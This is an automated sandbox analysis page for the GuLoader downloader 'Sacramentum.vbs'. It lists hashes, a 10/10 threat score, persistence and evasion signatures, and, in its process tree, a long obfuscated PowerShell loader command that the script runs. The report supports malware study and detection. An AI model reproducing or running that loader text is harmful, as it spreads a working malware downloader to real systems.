Overview

overview

10

Static

static

Sacramentum.vbs

windows7-x64

10

Sacramentum.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    165s
  • max time network
    192s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    16-01-2023 07:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Sacramentum.vbs

  • Size

    187KB

  • MD5

    f37664c2b8d6cac837ed746dd16cca4a

  • SHA1

    ce14d2136d71fa4995b845a8110ac53e592df843

  • SHA256

    cde3bcc2302329397625192ab5096fdd43d5332207815cede5d7ddf619bc4063

  • SHA512

    ea81979c6559e380352801a2aa16ff00e800793a8a66a799d8987504a9605e340a6a79d345bceaec98654b5370cebda77c34078ae9171dcb99e72d01803d8a26

  • SSDEEP

    3072:CGaYrxUPGOMccSzwZbEa3eKkwt6+HBgfflqq+cR+WM:6YkMMzcbEa3kwU6mfdq7cRhM

Score
10/10
guloaderdownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sacramentum.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Odontornithes = """FjeFDeluTvrnPrecStytSoliMaioExenPhi untHCocTTauBSni Spi{Ret Bib tyr Hed AnnpEleaAbarSanaPromDec(Grs[DelSKartPrirTwaiCutnAltgFri]Fou<ProHIdaSAnt)Und;per Mel Pea Avl Fas<SmoBMoiyGuntTraeBlasFld Ube=Her UndNStieMotwSow-OutOPanbserjSomeKlocDeztPro VirbBevyAritOmdenav[Pri]Bre ron(Fra<LacHDisSApp.AnmLWheeLatnRepgPritReshSte Dkk/Bli Who2Sca)Off;Sel Kry Med Blg WayFchuoHjerGvi(Inf<SuriBlg=Out0Cha;Fus Tyg<BruiKap Nak-TellUnctSkr Ude<HanHDigSHer.TynLHoveLsbndodgDmmtkauhNyt;Ove Pub<UnoiAne+Phl=unw2Rab)Tem{Ast Van Gra Afl mis Bri Fal Fra Sec<olmBExpyModtAereAmbsDes[Mod<TraiJil/Nhe2Per]Syn For=Opr Pla[SpicDavoSprnMosvSaleBlorUnitNis]Mor:Arc:SkjTNeuoKvaBSeryrostYdeeUdl(Udv<BegHLedSWoo.QuiSMiluLegbImpsAertMesrKatifagnUnegMil(Chi<PreiBut,Udh Jol2Bom)Dor,Str unf1Hos6exp)sab;Cal Cir Syb<ForBirryBaitGigeBlusops[mel<BiliSca/Har2Spr]Nav Daa=Flu Kos(Sin<patBAllyUdgtStrePolsWol[Bra<Berioak/Unb2Non]Myx Fat-BabbStaxPotoButrUsa Hal1Rdb4Sma2Rip)Brn;bai Fle Els Din Int}Gar pin[UnaSMartForrOmfiStanChagPot]Pol[VejSUdhyovesEuptUnaeVilmBac.konTVideThoxOvetHes.ResEMadnafhcSepoTuddZomiFrenStrgOve]Udl:Inv:EndAProSTurCGamIPluIace.UnbGEvaeChrtSkrSUndtAmarPlaiEksnDalgEnt(Poe<DocbCaryUnstNoneWitsAla)Pro;Dis}Omd<SedUMennAfsaNyriEncmIsoeTmmdNaz0Kya=AppHRekTGurBSic Sko'AncDTelDIntFBes7BadFMerDBouFbedAEntEHovBStaEUnp3PalAFlo0FarEDepAButERet2RevEKup2Bou'Sta;Ove<PreUkronGulafjliSvamJageDubdrve1Enh=IllHKurTTatBepe ove'MinCMyt3AspEFre7SysEKriDSanFNedCCanEKna1KanFAflDOveEudk1FilEakt8udsFlykAPseADag0TelDTal9TaaERac7AdeEVir0EpiBVegDFinBAccCJibACol0shuDLabBAnaEAlk0ParFUmaDAppENocFArkECad8TysEDiaBTriCstn0BenESonFskaFZooACorEWhi7SenFLug8BorEApoBnyhCCom3StvENatBUnsFMotASciESof6Vy ECal1PosEMisAAstFdenDPen'Fri;Imp<VolUPennAnfaDumiSnomKoneHytdTun2Liv=StoHDatTDerBArr Ita'AntCCla9epiEOveBBlgFNonABreDCorEparFSkrCVibERes1ForEStrDBioCCulFBruEAttASjaEReaAMlkFVelCOutErenBSpaFVadDgruFConDide'Fly;Bul<JerUslunDisaMetiFemmSkeeautdSkr3Ekv=ManHSulTUmbBCen pil'PerDLavDrudFObs7UneFSulDPurFPoaAPagEDolBRapENom3PerALod0StuDSidCDisFSkaBCarEElb0GebFYelAGesENed7EffEsin3ManEAnaBInoAFor0EleCMet7dykERis0RegFPerAMelEStrBUnrFEroCEilEred1PasFMedETraDSpiDExaEEstBCivFSelCTheFAph8SvkEPul7royErabDWhaEAfpBLyoFForDBanAAde0sicCfyl6HurETruFLinEEsp0CryESinAAlmESko2KonEWitBParDAlrCStaEJohBFleEAlm8Pol'Com;Shi<EurUStynStaaartiCormReseLevdRet4Jon=DepHSizTRetBRos Ryg'SkiFSmaDNonFRatAUfoFShaCBlaEsta7PemEGan0PrsEBlu9alf'Hun;Tri<FraUhulnMysakryiRecmNoneDemdFri5Flu=OutHmarTBekBMar ind'RghCble9yeaEBesBdolFEftATilCFno3BooEInf1DunEobsARenFSteBEriEVil2CoaECatBfleCHai6TimEPriFSalEMis0SpiERulAcerEMis2AplELanBNyf'Sys;Gra<ScrUDidnVegaOveiRuimKoneSupdRaf6Pyr=UndHAceTGotBspe Whi'DivDKanCAfbDDumAbruDkryDSenFRegEStiETalBSanEProDStaEAfr7ComEstaFCerEman2TerCKva0SamEnedFTwiEbac3UndENivBUnvANon2BamAundEDomCUnt6ThiECuc7MarEposAAddEQuaBMasCsumCAgiFPri7SkaDKonDCheEBev7PreEAor9ReoAtor2preADatEBeaDTimEMerFCouBSteEUdrCcivEPer2LanERes7nydETilDLam'Cas;Uno<UfuUSvmnPanaForiMismAdreSladFor7Gra=klaHExoTNerBInd Non'ArkDOctCcarFComBSunERep0FilFrepAComEOut7AdlEPyt3FylEReaBVieAovi2UnpAGraESprCdra3UndEMdeFmonEBio0EquEUnrFHasECra9JorEUndBbloEindAove'Reg;Gou<TorUBognToiaIndiKnumIlleTridMou8Gra=ScuHTarTHunBRik Can'SwaDDifCTriEParBPorESub8BruEcro2HumEMilBNavESecDSkyFAnoASubEHavBIndEUdsATheCPriAChaELeuBLulEObe2CalEStrBGroEEle9PraESamFBorFSiaAPosEMonBFal'Res;Stv<DisUhjenrieaSpoiDifmHjeeFlodInt9Pho=FacHKokTBerBHav Una'HydCNon7ForEUns0FlyCDec3OtoEVejBHypEPop3FolEBra1PerFRolCStaFBra7OutCCas3oveEHan1KonEbalAKerFUniBcreEAkt2WorEBesBten'Cuo;kre<EriRstuaImblMuslAmpeRintUly0Ste=FauHPyoTAmaBVol Fut'DisCSmu3QuiFHod7DisCDelARotEFilBSpkEAgo2SprEKnsBSyrEUds9TerEporFFonFEarASorEBemBOveDFemAAngFUro7SpeFSpgEHeyEBruBTkn'Ryk;Has<IdeRProaActlEpilDrjehoftAtt1Ufo=MulHDasTPieBFem Pol'QuaCWroDnatESla2ChuEaffFSkuFUnhDKadFUnmDLivAAdm2AutAFjeESskDTapEHerFminBCleEOphCScrEStv2SkaESec7ColEVraDGalAUds2SilATegEFenDFroDCopEGoaBBriERafFGarEMen2ExcEPerBPreEDemACheARic2IntAmadEUnrCsynFMatESly0SweFPerDsndEAan7ShoCFugDMouENat2AarEPsyFKerFFreDFakFresDComAdri2PodAEpeEForCFdeFBifFAdoBOrkFterAUdkEInd1SwiCUdmDTraETra2EffEHelFPreFRegDKafFsynDNon'Rec;Kar<TimRInaaBuklReclReseTartint2Acr=BerHEjeTVanBAcc pro'EpiCBeh7HumEFel0proFTil8ConEFer1helEEmp5DikEStuBFor'Fet;Cla<BasRWryaStrlTrylNeceoomtUnh3Nat=CanHfreTMajBirr Uni'SceDTheEVerFpolBsonEPylCNrrEEnd2DetESkr7ChoELouDRegASim2BenACheESgaCGra6OrdEBri7ThrEgenAOddEbieBMycCTafCProFJer7EbuDTraDGuaEvul7RecEUnd9DelAUns2SvoAUriEFleCgra0SooEForBOphFPsy9Tr DFlnDProEShr2KetESul1EleFonoASucAGas2RomAbokEDkkDUnr8StrEFas7VveFTigCFejFMisALyrFSedBsikEResFBoeEVot2Ele'epi;Ple<UnfRPalaIndlBoglDaneBlattrn4kar=FlyHHydTMejBSys Dyr'TriDOpa8GriEAgg7ChlFMagCBroFEleAUglFForBAarEstaFDenESpa2AstCAlbFArbEStj2KraEEug2SliEpse1TacEBibDHjk'Spe;Smo<TubRUncaNonlReglRepeNastBin5Mod=TarHUdtTEpiBUdb Ste'VenEped0SteFdogAGenENonAphrELoc2MasEout2Ski'Yab;Mic<ShiRmrkaKrolGanlGaleTamtUsk6Fak=UndHEkvTChaBmus Jes'MolCube0KenFStiALagDPseEbalFStrCInfEThu1malFMesAAlcEItaBNonEDamDMarFdivACarDPyo8angEKog7BolFDerCSycFForASkiFSlsBQuoEAssFRebEByg2FulCSty3AfpEKonBmeaEGla3UnaEMon1SluFIndCInsFPin7Ban'Fol;Uni<HgtRhofaFlilSpolTireSmrtAvo7Lom=MalHmedTTanBUnb Dre'IklCMot7JobCChrBwonDAro6Ana'Jai;For<FraRDisaDatlYoylNatefretant8Udr=GliHDefTAarBBro Iso'HypDBrn2For'Gri;ForSSikeCamtSte-IndADeplKruiBudaAlmsTra Bes-TacnStuaTilmFareSor KniREstaLanlSynlDedeShitCyc9Sub Fut-CelvKruaBaslFouuKoseSpo Arc<VarRSpiacaplCitlNuleMimtFiz7for;RocfSaruBibnSkocPattsupirygoMernIod FrsfblukClopCat Got{NunPAnkaCharDruaPromTva Tea(Org<ChrvUfo_bedmSem,tre Pod<BravPol_SprpKnt)Sca Que Tre Fur Pre Cap;Atr<brosProiDidlTapdUvueBanfAuddBurnSagiHumnstigNar0Dis Ind=FrdHDenTBraBpar Sva'UntACivAhydFBar8DehFSynBRemEopk0AgeEEnd3UnaASviEIntBCyc3AnaAKreEAutAMar6KurDUns5BrnCBelFBruFNosELutFFolEFraCUdhAGltEKat1ExtEPig3smdEhemFFlaETal7AweEOve0KnoDHym3CarBNhp4EleBDis4NonCMacDBopFBrnBGnoFDisCToaFRoaCAsmENonBNonESde0bagFskvAGruCThiARefEGla1SamESma3RheEMarFFasEBaj7EngEFlu0TagAKla0RowCChy9FreEPhyBDomFComASupCIndFMisFsolDPriFReqDUnaERobBFasEBes3GlaEBorCresEPos2MisEImp7AppEKauBKroFBilDIsoAObo6MarAArg7KenAPenENucFUnc2AutAOutESkjDBid9HanEKva6VapEAerBRavFSibCOffEVisBTeuAKuf3NonCseg1SymEPeeCbriESut4TogERigBSkuEUnfDAflFAvoAforAPerEDriFNon5PleAObeESyeARegAMetDTur1BanABri0ExcCIso9tanEAer2MaaEDem1IndEploCTilEbelFEtyEHel2PemCBalFNonFBlgDRonFRedDUnsESalBSalEkam3SkrEHovCStaEEks2hydFUsi7UndCVerDMisEartFFujENeuDEmbEPut6KomEatmBBreAeviENotACre3WisCPetFForEFly0morEUnwAOtoAgifEBlaATerAHelDHyb1TorALov0MilCCiv2PlrEArv1BibEUomDFroECorFSciFEndAConEMyn7SchEune1OveEtuj0DifAUnp0DatDPanDPacFVedESkrEIng2AnkESpa7SkyFOpkAPreAAfd6VulASlsAFagDSdeCTjeESirFAreEPej2ForEAla2AquEAmeBOveFBufAHapBEff6TorAEff7KoeDMan5BonASla3StuBDelFUncDana3AtoAPal0LasCMadBTenFSkrFMemFCorBIhnEafbFMatEKel2ForFFloDAtoAHjr6TalAEyeARefDUndBAnaETer0EleEHamFBorEKei7EftECru3BorEHifBUnbESquAIntBdegETilANon7HarAundEAnsFTes3MarABea7DrhAAri0RgnCLeu9VarELivBSokFBolARomDBowAAboFDri7KamFInvEKeiEAfkBImpATrs6SamAKunAtreDBloBReaEFor0EntEmyzFHovEAdi7LspEExt3StaEIagBSurESimACavBPoiFBlaAAur7You'Imp;UntRUdaaUtalSiklOveeBaktSpd9Til Ops<GodsPiriobslDisdColeBolfPledPannBogiFoxnCocgKnr0Pot;Ups<BvesReeiFrelVoldTroeSvefPindandnChyiRecnOmngIss5ken unc=Hvi svbHKleTImmBUdg Dia'PraABraAStyFSke8FosESolFAfrFSkuCLaeDher1OveEBik9SouFMusEunpEFjeFBorARimEFibBAnd3RrhASkaEAmtAWauAOutFGil8OphFDanBGeoESka0AluEMin3IndAPro0FadCTag9lenESprBVarFSupAStrChem3CriEOarBHeuFNonASafEFil6SupESha1RelEStiASocAPot6VetAGumAMarDNonBSemEFes0UdvEgutFSidEfor7TamEGra3BekEAfkBRakETraAbenBTurCdisAVar2DreASoaEOutDAkt5UdeDAdoAPanFGry7KaiFFoeEOmbEProBindDtri5autDSil3TyrDEbu3HypAEneEConCMedEFroASam6UnsAsniAStiDDanBIndESpr0SumESesFReaEFol7SekEDet3UndEslyBbaiEVanACulBTveDcamAPhi2BraAOrvERenAGruAOveDHopBMytEUnd0assEArbFArbEfyr7TylEsam3parEZinBGunEForAOutBUdtAKonAElg7AkvAAnr7Kon'mas;FriRParaFillRgelGeneHiptPro9Ech Tal<SemsOveiNeplCoudBuxeUskfOutdInenCoriMemnCacgSys5Com;Hyp<GursPosiUnslAscdAdmegamfCapdAninLaniMyenPoegErn1Std Sti=For WynHEmbTtraBvel Squ'CisFNytCStoECraBTerFSufAMatFZabBFewFLibCTelEKng0LnkAOvaEOmhAReeAhuuFMau8UfoEUteFSukFTekCFalDUdd1MalEOve9ReqFrejEDekEChaFSimAUds0OmsCWol7midEEnz0OvuFUnt8TorEImp1JonEsyn5PhyEEphBMarACon6eksAPreANunEEks0NonFBanBJobEStu2NemESto2SkrASpa2ChuASauEberCFacEEnuAFun6LysDPen5HyrDHolDTrhFRin7BraFtolDHotFSkrAUbeEFreBUddEHar3KedATri0InkDTsaCManFUncBSciEFug0PimFStrAMetESen7TraECra3MosEIllBProAnon0SluCBew7MalEDis0AltFUneAForESkrBTanFFerCSeiEhjt1StrFDipEVanDHumDStaETugBConFScrCShoFPro8TriEUnd7ReuEKitDSolEOdoBHinFLimDOliAPep0MyrClov6BotEFusFSenEund0SerEMelAchuEkir2JavEIndBintDRadCNedERolBSynEDak8FupDArb3MonAtru6BarCSnu0TilETemBnonFLam9kleASte3SlgCBed1CorEGenCRekEHan4LevETkkBthrEErkDTerFattASplAVanEJulDNutDForFInd7ZolFSanDSapFProASinEFerBIneEafp3tsoAFes0BybDTumCStiFPolBAngESta0TomFSidAEgoERis7GolEAzo3UndESmaBLarAfem0HelCMeg7UngEPre0AntFOveAPlaEAltBCorFRinCBisEple1ConFOplESpeDDreDmulELogBRumFKliCWirFUnc8SerENon7IndEReeDSubEKabBTilFUneDForALov0SkrCArt6PrcEAkkFTriEKro0ChoEZagAhypEKon2KonEidiBUdvDSkiCPhlEHomBUndESee8UgeArig6JeaArin6SpiCMic0skrEtraBExpFAst9SilAMah3TurCNon1SpeEStrCTroEapp4PagECouBCraEBioDDerFGarAUrtAZitEPolCBar7CteESky0UnmFSteASymDUnrEUdsFkomARotFIldCBekAMar7phoAUng2JudAChaETydANin6AutADagAHovFDec8WabFBarBVelEKun0penEhyd3IntADre0AukCAgd9ReaEReoBVekFScrAInfCFla3ImbEklaBAlmFConAGloERes6HanEopg1WidENdsAUnrAStj6traATakASekDappBxenEDet0VseEveiFEurEshi7SepEGer3FulEPauBTopEpreADisBTelBKolABld7rimAhei7FelAFje0DicCGly7CalEOpp0MonFSil8GasEFal1ByrERen5SpeEFejBAntAKud6NonAHinAPrsETje0HesFConBSowEEdi2BalEMic2EftAnym2LonAMelERejCOktESvaAUve6karAFrdAStaFTre8PolDCim1meaECdc3UltAVos7ForASen7BasACoc7ChrADeh7UnnATet2LysATenECarAUbeARanFLug8MyoDRec1KaiFGanEOblADes7AdeACan7Nor'sta;ObeRBusaRellDuslRadeContSal9Sko Sta<UdrsNigiPaslMavdSmieOvefIrrdBlanTimispanTicgDie1Lan;Soc}BedfVisuOvenUnicBuntSviiHuroShinJal UomGUdkDAfvTNed Zyg{AutPfolaPrerKaraGenmAdd Gen(Sgs[EksPDepaEmirUbeamugmDeneKvatSkoeRokrSub(KikPDecoInvsAdmiUdktStaiCocoBornAfb Vaf=Udb Kej0Tan,Ann RejMIntaskvncoldtidaEnatDodoJinrBrayunm Alg=Mar Bkk<DinTSikrAftuRapeSyn)Pre]Rec Pal[UnsTAppySttpDiseCro[Xer]aft]Fel Gru<PosvAntaGrirspl_GenpFdeaPuprInfaMajmunmeBeftElveBygrusisDvt,ove[CacPOffaColrSliamenmAireSprtTroeskrrDek(sloPEasoDivsProiFartPariArnoStenTwa Tll=Kby Kad1Sol)Unc]Fli Zyg[HarTComySubpAfseEle]For Tra<VidvkomrSpotJoh baa=Eft Und[narVLykoHaliFredAnt]Unf)Ang;Dej<OvesZooiMyelHypdsemeRulfZygdOvensoliAnanMorgAnt2Kre Res=For OmsHSerTGadBMel Der'OveAMusAScyDPra8palDAflAStjCPesCCysATrgENonBDer3StiABacETraDDry5ZinCExcFUnsFPosEtnkFDelEConCEleAGovEStr1SpoEunp3TouEUdhFUdaEZap7OpvEBla0SchDVet3herBFle4DaaBSam4ExtCTreDDruFNarBskiFgalCDefFDenCTriEKonBTreEGru0OrcFSprASkrCBasASkrECom1LnoEVie3AftESgeFLsrEVom7SpgEOli0VesASup0KurCMedAJorEWhiBKolERec8BodESea7SkoEVrd0AfsESorBSysCAlfAChrFPun7LauESma0ShaERvtFUltEKal3LinEOve7ForECarDPurCMoyFSkyFPteDUnsFaflDCruEFutBmyrEObs3CurERavCBenEDep2PleFMys7DayABin6IrrABes6PikCCov0pulEskrBUnhFChe9RepAVej3MarCFla1DanEStrCGalESai4bloEOveBSamEChoDNonFBeaAGriACylENedDBrnDTerFEge7RegFunmDWooFElfABgeEJaiBDipEPte3SkoAPad0HumDPraCTutESnoBMagETub8FleEagu2OktEgraBKnyEAlkDSkrFoptAOveEIch7evaEKon1ComEDre0SubABes0BesCOwnFTizFForDEngFMosDUniEUroBAarETim3InfERnnCKryEFer2UdlFCui7PhoCkon0JulEVilFantEUnl3SamESupBforAbom6PukAManASpaDInsBUndESea0UnaERacFDynEMet7BorEakt3OveERunBPalESpeABouBLyk6LepAHyp7JulANon7CroAMur2MulAKirEComDCha5MyxDsaaDEtlFCor7ValFBlaDEmbFBrnANorEDemBChaEDyb3AmeARav0AilDSubCSagESenBJoiEJan8GebElej2ColEattBKraEExcDNoaFsinAResETil7BruEKon1ProEsyb0UbeARep0VarCAnaBCopERes3PaiEPel7BahFEleAvikAMin0EurCOmlFgetFSocDCraFRecDGl EgabBSpaEFod3HemEFroCBygEOun2OrdFMus7SubCTogCValFExcBPolEBlo7CisEUdv2VrnEBusAKulESprBBlaFFugCBatCBonFkanEOprDTroEDisDWorEFidBSkiFSanDBouFJagDTwiDMis3CouBKab4TauBGeo4HemDflyCHusFKarBStaEOrd0BraAFis7LdeANon0SfaCCavADelESpeBChaEFin8undEIdo7UnsEIde0SnaESidBtacCTurArazFGal7TenEUns0AktESapFStdEDro3PalEWal7PrcETelDDetCDen3BraEDek1TerEGasAVidFAdnBDauEPah2FesEMopBCraATan6YngAPonARegDSnaBFalEDys0LufEMalFProEMod7SkiESta3ForEAllBMasEEilAKinBSal7VldASej2feuAGunESirAPenAFasEFde8savEVenFTalEHel2DriFPreDDilEIndBBorAmod7HadAOpk0BloCBrsApieEGraBSysETem8ideEBru7OveESil0NonERefBSofDUnfAPsoFuni7DecFHefENegEProBPlaAOak6RopABioABalDhawCDenEPosFSugEEri2ComEKvi2freEoveBTraFGunAaffBLevEMulABig2LomASpaEWasAParAwheDHelCPisEFleFSkrEBed2RosEDoc2mulESprBYawFCreATudBKafFMosAAss2MagAUdsELepDAbm5KafDhapDMarFLea7penFForDErfFpyrAAkkEBedBAfsELar3DurAFel0MauCPec3SkiFAstBFraEInt2NanFErhAOpsESta7TumEKapDUndEBotFForFForDOveFSpeABigCTrrANocEequBEleERes2herEAbnBDraEart9BalETreFPleFUdjASymEBadBobsDUnd3UnsAUnd7Tog'Drm;PanRZooaGralSublDeoeUnctNat9Trf Bef<SassGeriprolEcodRateVenfReadUnsnteriFlnnUtrgLit2Kom;Hov<UnrsaldiGadlAljdUnbeGrufPladFodnDisiTeanRetgRev3Ind Uhe=Uds CluHmasTNonBSta Syl'PetASwaAPriDJok8BesDpanABetCHogCUdeAKam0demCProAWinEPhiBOveESum8MarENyn7OstEKom0DevEBreBPaaCtabDPseEBru1ChaEGlo0KonFUnlDSveFNonAAfsFLejCTonFEavBForEDrsDBisFEgeAGerELyt1BroFBesCEmiAFor6ObsALeuAEndDModBMetEHov0TryETaaFSheEDip7BanESpe3OmgEForBBorEBruAMesBMar8RamATan2PosAzoaELicDSil5RadDOatDSelFTip7ErmFlitDgenFIrrAKunEDisBJanEFje3CofAObo0PlaDNonCNonEFlaBFlaEdis8SteEHus2AikEStaBUnoEBulDRenFUnsASinEtid7EleEMor1BroEDis0RinAUde0ForChanDChiEUnsFCheEKlo2DatEgen2MazESta7FesERej0OliEMar9ErhCParDAdmEBrn1MisEEch0LinFSkn8SmyEthrBRehEPug0FaiFLepANelESki7FlaEVin1ObsENet0RegFFenDSliDSkn3MidBCoc4SilBExt4CisDNeeDBowFGynAAutEBraFSerEnon0HelEVraAProESlaFHenFSgeCMerETreAAmaAEnf2StjADisEInaAForALekFSno8unsEPirFLerFCebCOrlDUna1InvFTenEMyrEKonFHdrFFlaCUreESolFTypEWen3HvlEDepBUdvFTraANedELanBTekFApoCLiqFGelDOveAGru7SteArdl0ForDGibDInkESulBSesFEleAKatCFun7snoEFis3BalFBroEratEDil2UndEBesBCarECot3UnaEStrBUntECen0AvgFNigAInrEAriFFldFBicArefEOve7medECsu1StuEMaa0HamCFot8SneETre2UdtELorFHorEFor9ValFStkDKapAGri6TriAWy AAbbDHelBGruELag0ValEResFFarEInt7IsrEPat3NonEtigBUomESmaARegBFic9HouABer7Par'exi;SemRRunaFanlPoslHaaegyntInd9Zoo Kon<bensSciidiplMusdTileDigfShodDelnLemiVannBoegAzo3Bil;Laz<SalsVitiBrnlGuidForeSupfJerdNonnBesiIdmnMingFar4Sek Fil=Roa HelHFanTDisBOut Fre'PseAPhoADraDAnd8WroDSilAExaCFomCPhaAKra0NatCGivAMidEBalBAntEobs8RegETvr7KarELys0SkkEFraBForCSlu3antEBraBTutFSubADevEImd6FalESkn1FedEEksAMenAFal6CapAWeaAMorDAntCUdlEEriFWasERaa2AbeESys2AdvEStyBsucFrecASwaBNivCKlaADra2AfsAGidEEntAOffAForDUdbCSpaEAccFwroESkr2UtvEUni2ViaEFdsBBesFTraAOutBSanDIndASpe2SkjAGelEComAEroASmaFrs 8ArbFWetCForFMesARelADaa2MucAArrEHimAKorACheFFor8RopEskaFFreFOneCMelDOve1ParFReaETorEHolFModFIrrCsubEBluFKthESem3NonEGuzBRegFBolAVelEForBMotFBebCSleFBedDAkiASka7NonAKan0BafDMaaDUnoEConBUncFPolATruCDal7bryESeq3SteFSteERegEcen2FysEIntBNepEFro3GasECosBBlaEUnu0anhFForAAutEChaFScuFNonAKeyEslo7TidEKra1FlaEBra0GruCKra8CloEPse2GngEPolFInsEded9SofFtekDForAFra6DinASexAUnsDImmBMesEFor0SphEeksFLanEBen7ParEnot3CruELocBOveEfilAterBAke9QuiATwa7Erh'Nvn;FemRMycaTuslArelSuceHemtEne9Rev Ned<HetsTetiDenlIntdOpneDiffReadSahnForiGalnTelgUnp4Tej;Mrk<NonsNociSphlFordCateAktfNdrdAffnTeriPotnEntgStr5Ran Smo=Tid BorHFjeTTraBsar Nep'PilFArkCfinERevBKlaFGteASpnFdomBNonFSieCFoxEIrr0KatAGreEAmdAsweACamDGen8ForDmelARevCEksCForAGul0IndCFluDVikFDodCMisEAttBTheEperFAarFsemAGruERadBPibDretAfraFUns7PraFBioEKroESteBFolAHav6MulABoe7Pat'inf;UnsRSelaExclUndlIseeMonthas9Ele Red<subsSteiAfhlSamdPreeMedfMardFalnAguistenribgSys5Hav Cop Azu Ill;Cer}Sho<BrdkBumkJub Sal=Sti PisHskuTProBCom Var'BruEQua5StaEPeaBTriFMilCPoiEvil0AllEInfBCirECon2FeaBAzoDrenBIndCTor'Smi;Urp<ClasboriAfrlTrodDiseTelfIntdHelnNoniWinnSacgSho6Cag Sca=Mal MelHErnTArcBHer all'SelASkuAanoFSpi8RamEKruFCiaFAnaCNonDFol1knaFUni8ConEPoeFAanABinEFirBThi3DagAImpEfluDfde5IndDLitDVulFLat7ModFHadDTorFHimAMarEbliBfraEImp3ZinAAna0WipDAlmCautFSidBPenEBra0NonFHamANonETal7HanEInt3WatEUslBSalARet0NerCSyl7BroEAnt0traFRanAHomELynBCorFStaCRkeEOmr1RhyFYelEdegDReiDUfoEFlaBMahFTraCOpuFDis8GumESex7TelELftDSymENonBRenFKagDUndAMan0ForCRep3HavEKalFSviFPenCSkaFOrdDGalESag6PliEJamFHygEUsu2KreDFor3ArtBFug4ConBBan4ricCWur9ForEExcBIntFbehADelCSpiAHenEUdbBSocECer2CysEBriBZioEEnt9MosEResFEnoFHemAMejEMisBProCHer8UnfEVel1RygFackCGilCBlo8IncFminBSvvEDat0BesESpiDJitFExuATypEAng7SilEHap1ayaEGet0CenDArnEDepEAfl1FadESeg7BeaEGul0FolFRavAAfbEfyrBBrnFJusCcavASkr6KonAunb6ImpEInc8PreEMis5DueFtilENaaASniERadAExoARocEGge5GlaERep5AveAInfEVenATkkAGonDTreCSleEBdeFBeaEAfb2SkrELov2HerEHinBPedFRetAAmpBMarARevACas7DatATip2KnoAAlfEAluATre6FedCLav9BenCbatARufDvinAtriAsanEHeaCKoeEKapAMac6RamDInd5FilCBuk7DiaEBli0ForFRadAKrsDTraEGloFkloAManFVedCTalDtru3DatAHaa2StoATynEmnsDCal5OveDSimBSprCUdb7RecERhi0SubFStaAStaBHolDEftBPauCForDUnd3StaAFra2RefATarEEndDHau5SkyDRomBSupCPre7PleEAds0FlaFOxyABesBSelDSigBmyrCUnhDCab3FamAUnc2SagASubEOprDPla5RegDLarBbugCGlo7udsEUds0UreFBliASidBimmDNarBSkrCliqDAut3TouASpl7AarALsgEudgAFal6RomDSta5simCGar7StrEfor0SkuFFurARudDSatEFabFDecAPorFEpiCPufDBum3KolAcat7temASup7AccABan7but'Ind;cenRNonaJudlUnplRepeMegtPaa9Hdk sle<VolscroianolspodUnaeAlcfInddAttnForiOosnLeggSon6Kan;Dre<AnsvTagaBarrSub_BrnnGaptWah Mil=Dit OmbfWetkBunpEst Mog<LsbRatraDovlSullddfeMaatCon5Csa Mar<EnsREmiaVollGarlConeMontSte6Sep;Gen<SvasKuliEntlUdtdConeConfNeodUndnLariUlonAfrgTer7Sem Lab=Bus afdHUudTModBMyn Kag'nonALnmANotCOve5CloEFle2KirENin7TerFVosENonFPacEIodEHeaBNonFOps8FinEUnd9ExeEPre9BekEUngBFinFUdsDSemBMicDCoxACreESanBMat3JenABogEBavAsmaAFlaFRea8spiESulFOpiFLitCslyDUnd1funFpus8OveEernFCorANon0GooCBil7levEPro0TerFSkr8NonERel1UdgEEks5MetETanBComAImp6MidDPre5AchCCat7StrEYog0BzeFHaeACopDTilECinFRapASprFShaCVolDDem3AnlBDks4MelBEno4TalDCam4MetEQuaBUndFChaCSlaEPer1posATil2PaaAAfrEUegBkon8reaBSkr9DisBlosBIdeBRevFbipABad2kdfAMitEddnBForEMirFAfs6TaaBLitDprmBTraEBerBStiEBorBHelEDipAUnn2JacAbraEAndBSkaEdueFPli6IndBRekAOphBTenEDetAMil7Non'Aro;UtaRHataSallMellRemeGuatOpf9Van Mon<SpksSymiSlulKradSiseLanfCridHasnPolisynnEmogSko7Bra;Ond<GrasVariOpalOprdVineKvafBrndTranTeriConnRolgtor8Tho Chr=gia FosHFroTMarBPet Dyr'PriASvaARegEYnd1ArbFMilCSunEUgl7TekAFlaETriBPos3ColAVedEEtyANonAAltFDen8ManEsalFCarFProCOutDPer1StrFSpr8FacEHerFDufAInn0ButCfig7PomEOpr0JobFChi8VitECot1IndEPat5MusEUndBFusAHrs6SpiDHar5ExoCSmo7IodETur0AntFNauAMlkDAviESkiFEstATheFUnpCAnkDCal3comBAth4UdvBAut4cykDSka4ecoEGanBRhiFKamCHovEArs1AntAWin2RusAJorEHanBfinERodFEks6RecBCruFMimBHarEDicBTipEPtoBPreEJerBForEBjeBPasEDisADul2BibAlidEBlaBRevEYmpFIma6ConBEcpDTisBRecEElaBVacEBldBTaeEOpbAFor2BudANonEWorBParEBreFTog6OutBTomAPotAPre7Van'Bel;SexRParaKonlSkilGyleLittPeg9Tom 